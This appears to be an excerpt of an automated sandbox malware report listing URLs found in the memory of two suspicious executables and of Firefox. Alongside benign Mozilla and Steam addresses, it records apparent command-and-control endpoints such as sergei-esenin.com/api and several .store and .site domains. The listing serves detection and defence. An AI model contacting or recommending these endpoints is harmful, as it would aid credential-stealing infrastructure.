Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3306081297.0000017084520000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tabListens
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 0000001B.00000003.3129585316.000001708BE5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreM
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_moreMore
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_morehome-prefs-recent-activity-header
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3306081297.0000017084520000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://getpocket.com/recommendationsDisplays
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/cfworker__absolute_recursive_ref__
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/google/closure-compiler/issues/3177
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/lit/lit/issues/1266
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3133141618.000001708BD30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://gpuweb.github.io/gpuweb/webrtc-global-mute-toggles
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/
Source: 26e226f915.exe, 0000000D.00000003.3109202383.0000000005E22000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3217655123.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219276546.0000000005972000.00000004.00000800.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219501177.0000000005975000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submitAre
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 0000001B.00000003.3142865401.0000017084B64000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3327365979.00000170852AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schemahttps://json-schema.org/draft/2020-12/schemahttp://json-
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2020-12/schema
Source: 26e226f915.exe, 0000000D.00000003.3032933485.0000000001605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://licendfilteo.site:443/api
Source: file.exe, 00000000.00000003.2134302834.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://licendfilteo.site:443/apiNh
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 0000001B.00000003.3221206285.000001708BF77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 0000001B.00000002.3303238080.00000170842E5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 0000001B.00000002.3303238080.00000170842E5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com08a40f72-8958-46f3-8b0d-9bdc1571b553resource://normandy/lib/Telemet
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource:///modules/UrlbarProviderSearchSuggestion
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestresource://gre/modules/reader/ReaderWorker.sys.mjs
Source: file.exe, 00000000.00000003.2134302834.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mobbipenju.store:443/api
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: 26e226f915.exe, 0000000D.00000003.3292795200.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/
Source: file.exe, 00000000.00000003.2222312016.0000000005747000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222209031.0000000005747000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2182156626.0000000005747000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181771630.0000000005744000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181613925.000000000573C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195779568.0000000005747000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214645182.0000000005747000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195426606.0000000005745000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2311841564.000000000573E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183440546.0000000005747000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/%%z.
Source: 26e226f915.exe, 0000000D.00000003.3166224749.0000000001693000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/%nd
Source: 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/&
Source: 26e226f915.exe, 0000000D.00000003.3292795200.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3141784645.00000000016A4000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292320842.000000000169A000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3241000436.0000000001031000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3283667229.0000000001033000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3258299540.000000000102F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.000000000101F000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3239956921.0000000001028000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3266928045.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3267904188.0000000001036000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3283179495.000000000103F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api
Source: 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api)
Source: 26e226f915.exe, 0000000D.00000003.3292795200.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api-H
Source: 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292795200.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api5H
Source: file.exe, 00000000.00000003.2181874930.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api:
Source: 26e226f915.exe, 0000000D.00000003.3292795200.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api=I
Source: file.exe, 00000000.00000003.2214689499.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2214773506.0000000000B12000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222363416.0000000000B10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/api_
Source: file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apie
Source: file.exe, 00000000.00000003.2312038397.0000000000B10000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2313035621.0000000000B12000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222363416.0000000000B10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apii
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292795200.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apimI
Source: file.exe, 00000000.00000003.2312038397.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apit
Source: file.exe, 00000000.00000003.2167537362.0000000005742000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/apiw/
Source: 26e226f915.exe, 0000000D.00000003.3166224749.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3292795200.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com/soft
Source: 26e226f915.exe, 0000000D.00000003.3032933485.0000000001605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/api
Source: file.exe, 00000000.00000003.2142391592.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sergei-esenin.com:443/apiNh
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3327365979.00000170852AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3300643832.0000017083EA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: 26e226f915.exe, 0000000D.00000003.3032933485.0000000001605000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spirittunek.store:443/api
Source: file.exe, 00000000.00000003.2134302834.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://spirittunek.store:443/apiii
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3129585316.000001708BEE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3321587430.0000017084F3E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.00000170844A5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000003.3129585316.000001708BE81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3304609166.00000170844CE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3281310236.000001708318D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userdiscoverystream.rec.impressions
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B16000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userdiscoverystream.rec.impressions__MSG_searchUrlGetParams__
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084AE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001B.00000002.3310993207.0000017084B09000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B06000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B54000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084AE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3308589953.0000017084A41000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.3310993207.0000017084B8F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: 26e226f915.exe, 0000000B.00000003.2901189210.000000000113D000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901189210.0000000001137000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com
Source: 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032933485.0000000001619000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3219630830.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3173301010.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3178327332.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3198150791.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: file.exe, 00000000.00000003.2142550438.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134448591.0000000000A84000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142391592.0000000000A83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134302834.0000000000A83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/=
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: file.exe, 00000000.00000003.2142341622.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142519929.0000000000AF2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134275878.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901061676.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000B.00000003.2901157759.00000000011D3000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000000D.00000003.3032649215.0000000001699000.00000004.00000020.00020000.00000000.sdmp, 26e226f915.exe, 0000001C.00000003.3122878737.000000000101C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: 26e226f915.exe, 0000000D.00000003.3032704846.000000000164B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/icro
